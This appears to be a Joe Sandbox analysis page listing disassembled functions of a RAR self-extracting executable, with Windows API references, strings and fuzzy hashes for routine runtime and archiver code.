Associated: 00000067.00000002.2422259960.00007FF695D59000.00000008.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D5A000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D64000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D6E000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D76000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422425142.00007FF695D78000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422459095.00007FF695D7E000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_103_2_7ff695cd0000_rar.jbxd

Similarity

API ID:
String ID: exe$rar$rebuilt.$sfx
API String ID: 0-13699710
Opcode ID: ebf3ee1c537ad006fb1fd952ea697eae8a354c11a52e42eab83d53570c1c5079
Instruction ID: 330502317d977db0bf703fdbcaff1e152bd5a8054cbd042a1b8aa26512029547
Opcode Fuzzy Hash: ebf3ee1c537ad006fb1fd952ea697eae8a354c11a52e42eab83d53570c1c5079
Instruction Fuzzy Hash: 2581A522A0C68285EA30EB35D4112FD27D2FF85B94F4052B6D94DCB6CADE6DED09C344

Function 00007FF695D2E0C0 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 164COMMON

Download Yara Rule

APIs

abort.LIBCMT ref: 00007FF695D2E0F4
_IsNonwritableInCurrentImage.LIBCMT ref: 00007FF695D2E1BC
RtlUnwindEx.KERNEL32 ref: 00007FF695D2E20B

Strings

f, xrefs: 00007FF695D2E13A
csm, xrefs: 00007FF695D2E1A2

Memory Dump Source

Source File: 00000067.00000002.2422125034.00007FF695CD1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF695CD0000, based on PE: true

Associated: 00000067.00000002.2422092068.00007FF695CD0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422182749.00007FF695D40000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422226086.00007FF695D58000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422259960.00007FF695D59000.00000008.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D5A000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D64000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D6E000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D76000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422425142.00007FF695D78000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422459095.00007FF695D7E000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_103_2_7ff695cd0000_rar.jbxd

Similarity

API ID: CurrentImageNonwritableUnwindabort
String ID: csm$f
API String ID: 3913153233-629598281
Opcode ID: cb6d980e5d8e076ab593136caf69effa74300e2f691bd4e1b53b09370fd6a73c
Instruction ID: 207ffb10419b39d6e4d76dd71a11a74e7098fbd780111b491386a443d05fe412
Opcode Fuzzy Hash: cb6d980e5d8e076ab593136caf69effa74300e2f691bd4e1b53b09370fd6a73c
Instruction Fuzzy Hash: F6619232A0964286EB38DF11E444A7927D1FF44F94F14A674DE0E87788DF38EC4A8B08

Function 00007FF695CEEA18 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 79COMMON

Download Yara Rule

APIs

GetFileSecurityW.ADVAPI32(?,00007FF695CEEBC2), ref: 00007FF695CEEA7C
GetFileSecurityW.ADVAPI32(?,00007FF695CEEBC2), ref: 00007FF695CEEABC
GetSecurityDescriptorLength.ADVAPI32(?,00007FF695CEEBC2), ref: 00007FF695CEEB0A

Strings

, xrefs: 00007FF695CEEAE3
ACL, xrefs: 00007FF695CEEB39

Memory Dump Source

Source File: 00000067.00000002.2422125034.00007FF695CD1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF695CD0000, based on PE: true

Associated: 00000067.00000002.2422092068.00007FF695CD0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422182749.00007FF695D40000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422226086.00007FF695D58000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422259960.00007FF695D59000.00000008.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D5A000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D64000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D6E000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D76000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422425142.00007FF695D78000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422459095.00007FF695D7E000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_103_2_7ff695cd0000_rar.jbxd

Similarity

API ID: Security$File$DescriptorLength
String ID: $ACL
API String ID: 2361174398-1852320022
Opcode ID: 99ab71e5ccbbe398f237f971ffe9b39aed517989f3bcccf534b2133dda1e344d
Instruction ID: 8fbe0e83e7f25670866ac4a2302a21fc00997f17a07d65b08f103ab29b6de0ff
Opcode Fuzzy Hash: 99ab71e5ccbbe398f237f971ffe9b39aed517989f3bcccf534b2133dda1e344d
Instruction Fuzzy Hash: 92318022A09A8182EA30DB11E4513F973E4FB88B80F805175EA8D93796DF3CEE49C744

Function 00007FF695CD7188 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 62libraryloaderCOMMON

Download Yara Rule

APIs

CompareStringOrdinal.KERNEL32 ref: 00007FF695CD722B

Part of subcall function 00007FF695CF6754: GetVersionExW.KERNEL32 ref: 00007FF695CF6785

GetModuleHandleW.KERNEL32(?,?,?,?,?,00007FF695CD68EB), ref: 00007FF695CD71CB
GetProcAddress.KERNEL32(?,?,?,?,?,00007FF695CD68EB), ref: 00007FF695CD71E0

Strings

CompareStringOrdinal, xrefs: 00007FF695CD71D6
kernel32.dll, xrefs: 00007FF695CD71C4

Memory Dump Source

Source File: 00000067.00000002.2422125034.00007FF695CD1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF695CD0000, based on PE: true

Associated: 00000067.00000002.2422092068.00007FF695CD0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422182749.00007FF695D40000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422226086.00007FF695D58000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422259960.00007FF695D59000.00000008.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D5A000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D64000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D6E000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D76000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422425142.00007FF695D78000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422459095.00007FF695D7E000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_103_2_7ff695cd0000_rar.jbxd

Similarity

API ID: AddressCompareHandleModuleOrdinalProcStringVersion
String ID: CompareStringOrdinal$kernel32.dll
API String ID: 2522007465-2120454788
Opcode ID: 824e27df19e18241d1aa3afc9b2dae14d8d279d2568df75994383969d477b6a0
Instruction ID: 9c2617b58e12e13b5f2b1a053284f1de47897eb367d865a127bc72e0e909368c
Opcode Fuzzy Hash: 824e27df19e18241d1aa3afc9b2dae14d8d279d2568df75994383969d477b6a0
Instruction Fuzzy Hash: 0E217122A4C682C1F6309B55A844275A2F0FF51F80F5456BAEE5EC7698DF3CE8498304

Function 00007FF695D1BE3C Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 54COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF695D1BC8C: FileTimeToLocalFileTime.KERNEL32 ref: 00007FF695D1BCEF
Part of subcall function 00007FF695D1BC8C: FileTimeToSystemTime.KERNEL32 ref: 00007FF695D1BD68

swprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF695D1BEAE
swprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF695D1BED8

Strings

????-??-?? ??:??, xrefs: 00007FF695D1BEDF
%u-%02u-%02u %02u:%02u:%02u,%09u, xrefs: 00007FF695D1BE80
%u-%02u-%02u %02u:%02u, xrefs: 00007FF695D1BEB8

Memory Dump Source

Source File: 00000067.00000002.2422125034.00007FF695CD1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF695CD0000, based on PE: true

Associated: 00000067.00000002.2422092068.00007FF695CD0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422182749.00007FF695D40000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422226086.00007FF695D58000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422259960.00007FF695D59000.00000008.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D5A000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D64000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D6E000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D76000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422425142.00007FF695D78000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422459095.00007FF695D7E000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_103_2_7ff695cd0000_rar.jbxd

Similarity

API ID: Time$File$swprintf$LocalSystem
String ID: %u-%02u-%02u %02u:%02u$%u-%02u-%02u %02u:%02u:%02u,%09u$????-??-?? ??:??
API String ID: 1364621626-1794493780
Opcode ID: c631e38674febfb764440a3499547548297e94e1d6d8b8a415d39587179a0b79
Instruction ID: 72b70d4e037412d052017643963b7f6d46c85004e0e5b5ce06c76de6e326bfcc
Opcode Fuzzy Hash: c631e38674febfb764440a3499547548297e94e1d6d8b8a415d39587179a0b79
Instruction Fuzzy Hash: B3212476A182418EE760CF68E480AAD77F0F748B88F145176EE48D3B48DF38E8858F14

Function 00007FF695D324D4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32 ref: 00007FF695D324F4
GetProcAddress.KERNEL32 ref: 00007FF695D3250A
FreeLibrary.KERNEL32 ref: 00007FF695D3252F

Strings

CorExitProcess, xrefs: 00007FF695D32503
mscoree.dll, xrefs: 00007FF695D324EB

Memory Dump Source

Source File: 00000067.00000002.2422125034.00007FF695CD1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF695CD0000, based on PE: true

Associated: 00000067.00000002.2422092068.00007FF695CD0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422182749.00007FF695D40000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422226086.00007FF695D58000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422259960.00007FF695D59000.00000008.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D5A000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D64000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D6E000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D76000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422425142.00007FF695D78000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422459095.00007FF695D7E000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_103_2_7ff695cd0000_rar.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 62fc0dfec48af2956ca19e77247605bed92fa0407192cbb5e3de02daf22cabb6
Instruction ID: 1b5522b9c2c5641a7361f7e83ce1666c90be378c725250d71f3fe01471386c3f
Opcode Fuzzy Hash: 62fc0dfec48af2956ca19e77247605bed92fa0407192cbb5e3de02daf22cabb6
Instruction Fuzzy Hash: ABF03C21A19B4281EE658F11F49427923A1EF88FD4F483579EA4FC76A4DE3CD9888608

Function 00007FF695D3C654 Relevance: 7.8, APIs: 5, Instructions: 265COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000067.00000002.2422125034.00007FF695CD1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF695CD0000, based on PE: true

Associated: 00000067.00000002.2422092068.00007FF695CD0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422182749.00007FF695D40000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422226086.00007FF695D58000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422259960.00007FF695D59000.00000008.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D5A000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D64000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D6E000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D76000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422425142.00007FF695D78000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422459095.00007FF695D7E000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_103_2_7ff695cd0000_rar.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aecc19a358617ecaa8b6bbce6cc459dc0080c4c1e8e9e85a1fab47fbb6b6c597
Instruction ID: 8755ab83801e8da7652cbaf93c6bc52042d1d7a3a3f1bd13387e241b9e96d514
Opcode Fuzzy Hash: aecc19a358617ecaa8b6bbce6cc459dc0080c4c1e8e9e85a1fab47fbb6b6c597
Instruction Fuzzy Hash: BBA1E362B0878286EB708B6094403B926D1EF44FACF4567B5DE5D867E5EF7CEC488318

Function 00007FF695D37AB4 Relevance: 7.7, APIs: 5, Instructions: 203COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF695D37AF9

Memory Dump Source

Source File: 00000067.00000002.2422125034.00007FF695CD1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF695CD0000, based on PE: true

Associated: 00000067.00000002.2422092068.00007FF695CD0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422182749.00007FF695D40000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422226086.00007FF695D58000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422259960.00007FF695D59000.00000008.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D5A000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D64000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D6E000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D76000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422425142.00007FF695D78000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422459095.00007FF695D7E000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_103_2_7ff695cd0000_rar.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: d6b863787b9640c79ee2b1febadb7c504d9673d6b028f9ef991185c259ef8196
Instruction ID: a654ed653887ea637a1b16bc87f66e6d91a605334031b1197f625e9597a51252
Opcode Fuzzy Hash: d6b863787b9640c79ee2b1febadb7c504d9673d6b028f9ef991185c259ef8196
Instruction Fuzzy Hash: 9081BF22A18A5285F7309B6598806BD26E0FB44F4CF4463B5DE0ED37A1EF3CA949C718

Function 00007FF695D37428 Relevance: 7.6, APIs: 5, Instructions: 142fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?,00007FF695D37C5B), ref: 00007FF695D37485
WideCharToMultiByte.KERNEL32 ref: 00007FF695D37561
WriteFile.KERNEL32 ref: 00007FF695D37587
WriteFile.KERNEL32 ref: 00007FF695D375C6
GetLastError.KERNEL32 ref: 00007FF695D375FE

Memory Dump Source

Source File: 00000067.00000002.2422125034.00007FF695CD1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF695CD0000, based on PE: true

Associated: 00000067.00000002.2422092068.00007FF695CD0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422182749.00007FF695D40000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422226086.00007FF695D58000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422259960.00007FF695D59000.00000008.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D5A000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D64000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D6E000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D76000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422425142.00007FF695D78000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422459095.00007FF695D7E000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_103_2_7ff695cd0000_rar.jbxd

Similarity

API ID: FileWrite$ByteCharConsoleErrorLastMultiWide
String ID:
API String ID: 3659116390-0
Opcode ID: 96f561c31132e0ea19a5ef4c1750fe83e0f57ac60b3e80aac86a7179c63ec212
Instruction ID: 2d34e50d7c5476c69e443393e5c5c5b065359b7225318892d2165e05aa7e8199
Opcode Fuzzy Hash: 96f561c31132e0ea19a5ef4c1750fe83e0f57ac60b3e80aac86a7179c63ec212
Instruction Fuzzy Hash: DF51D472A18A5186E721CF65D4443AC3BF0FB45B98F049275DE4E87B98EF38D649C704

Function 00007FF695CE80C0 Relevance: 7.6, APIs: 5, Instructions: 118fileCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32 ref: 00007FF695CE814D
CharToOemA.USER32 ref: 00007FF695CE81D8
WriteFile.KERNEL32 ref: 00007FF695CE81FB
GetStdHandle.KERNEL32 ref: 00007FF695CE8242
WriteConsoleW.KERNEL32 ref: 00007FF695CE8266

Part of subcall function 00007FF695D1D840: WideCharToMultiByte.KERNEL32 ref: 00007FF695D1D871

Memory Dump Source

Source File: 00000067.00000002.2422125034.00007FF695CD1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF695CD0000, based on PE: true

Associated: 00000067.00000002.2422092068.00007FF695CD0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422182749.00007FF695D40000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422226086.00007FF695D58000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422259960.00007FF695D59000.00000008.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D5A000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D64000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D6E000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D76000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422425142.00007FF695D78000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422459095.00007FF695D7E000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_103_2_7ff695cd0000_rar.jbxd

Similarity

API ID: CharHandleWrite$ByteConsoleFileMultiWide
String ID:
API String ID: 643171463-0
Opcode ID: 654297ad72194e14295c68420ac164d852ec9683f320a24142875de6632070b4
Instruction ID: 6d55553910dac9a62004a546490c4772f37788f8e6a8b13c8ae83025d2e1f495
Opcode Fuzzy Hash: 654297ad72194e14295c68420ac164d852ec9683f320a24142875de6632070b4
Instruction Fuzzy Hash: D841A762E0CA4281F9349B20A8112B962E0EF45FE4F142379EE6DA77D5DF3CAD4D8744

Function 00007FF695D369B4 Relevance: 7.6, APIs: 5, Instructions: 114libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetProcAddress.KERNEL32 ref: 00007FF695D36AD6

Memory Dump Source

Source File: 00000067.00000002.2422125034.00007FF695CD1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF695CD0000, based on PE: true

Associated: 00000067.00000002.2422092068.00007FF695CD0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422182749.00007FF695D40000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422226086.00007FF695D58000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422259960.00007FF695D59000.00000008.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D5A000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D64000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D6E000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D76000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422425142.00007FF695D78000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422459095.00007FF695D7E000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_103_2_7ff695cd0000_rar.jbxd

Similarity

API ID: AddressProc
String ID:
API String ID: 190572456-0
Opcode ID: 0e6eb9f6afd3336ef7fae7e3833685d0b95f626a5f44511e493326727d516b6b
Instruction ID: 3a311cb103e401ab64b710761edbc938cffec265ac8052ffeb5d1ea88dfc1cdf
Opcode Fuzzy Hash: 0e6eb9f6afd3336ef7fae7e3833685d0b95f626a5f44511e493326727d516b6b
Instruction Fuzzy Hash: F241E421B0AA0292FA399F45A81457566D1FF04FD4F2AA675DD1DCB384EE3CE808C748

Function 00007FF695D3DC20 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

APIs

_set_statfp.LIBCMT ref: 00007FF695D3DC47
_set_statfp.LIBCMT ref: 00007FF695D3DC62
_set_statfp.LIBCMT ref: 00007FF695D3DC7E
_set_statfp.LIBCMT ref: 00007FF695D3DCBA

Memory Dump Source

Source File: 00000067.00000002.2422125034.00007FF695CD1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF695CD0000, based on PE: true

Associated: 00000067.00000002.2422092068.00007FF695CD0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422182749.00007FF695D40000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422226086.00007FF695D58000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422259960.00007FF695D59000.00000008.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D5A000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D64000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D6E000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D76000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422425142.00007FF695D78000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422459095.00007FF695D7E000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_103_2_7ff695cd0000_rar.jbxd

Similarity

API ID: _set_statfp
String ID:
API String ID: 1156100317-0
Opcode ID: 70895f6a6caca5a93f387097b68bfd30b7bf4dd7af3bc8c27b3038974be86bdd
Instruction ID: da9aa0a2c744d7f0fd43324b847778156017a7e8d6119b8e06d07643e6ff9349
Opcode Fuzzy Hash: 70895f6a6caca5a93f387097b68bfd30b7bf4dd7af3bc8c27b3038974be86bdd
Instruction Fuzzy Hash: AB118622E2860205F6B43229E48637511C1FF5DBE8E1467B4E56EC76F6CFBCAC4C4508

Function 00007FF695CE7514 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 189COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF695D1CD7C: MessageBeep.USER32(?,?,?,?,00007FF695CECA56,?,?,?,00007FF695D1B9B7), ref: 00007FF695D1CD9E

wcschr.LIBVCRUNTIME ref: 00007FF695CE7597
wcschr.LIBVCRUNTIME ref: 00007FF695CE768D

Strings

[%c]%ls, xrefs: 00007FF695CE7743
(, xrefs: 00007FF695CE7754

Memory Dump Source

Source File: 00000067.00000002.2422125034.00007FF695CD1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF695CD0000, based on PE: true

Associated: 00000067.00000002.2422092068.00007FF695CD0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422182749.00007FF695D40000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422226086.00007FF695D58000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422259960.00007FF695D59000.00000008.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D5A000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D64000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D6E000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D76000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422425142.00007FF695D78000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422459095.00007FF695D7E000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_103_2_7ff695cd0000_rar.jbxd

Similarity

API ID: wcschr$BeepMessage
String ID: ($[%c]%ls
API String ID: 1408639281-228076469
Opcode ID: 4d02bf8f4ce93e39c77e0184eba1caa1a1f2233ef547ea100f5889751ce62d16
Instruction ID: c5bfc47f390b8873700e10b7cfbbbdaadad481603600f62272a65cb3a157b9d0
Opcode Fuzzy Hash: 4d02bf8f4ce93e39c77e0184eba1caa1a1f2233ef547ea100f5889751ce62d16
Instruction Fuzzy Hash: 7381C523A0868182EA74DF05E4412BA67F5FB88F88F541179EA4E97759DF3CED45C700

Function 00007FF695CF6FE0 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 185COMMON

Download Yara Rule

APIs

swprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF695CF7176
swprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF695CF7221

Strings

%c%c%c%c%c%c%c, xrefs: 00007FF695CF71E3
%c%c%c%c%c%c%c%c%c, xrefs: 00007FF695CF716F

Memory Dump Source

Source File: 00000067.00000002.2422125034.00007FF695CD1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF695CD0000, based on PE: true

Associated: 00000067.00000002.2422092068.00007FF695CD0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422182749.00007FF695D40000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422226086.00007FF695D58000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422259960.00007FF695D59000.00000008.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D5A000.00000004.00000001.01000000.0000001A.sdmpDownload File
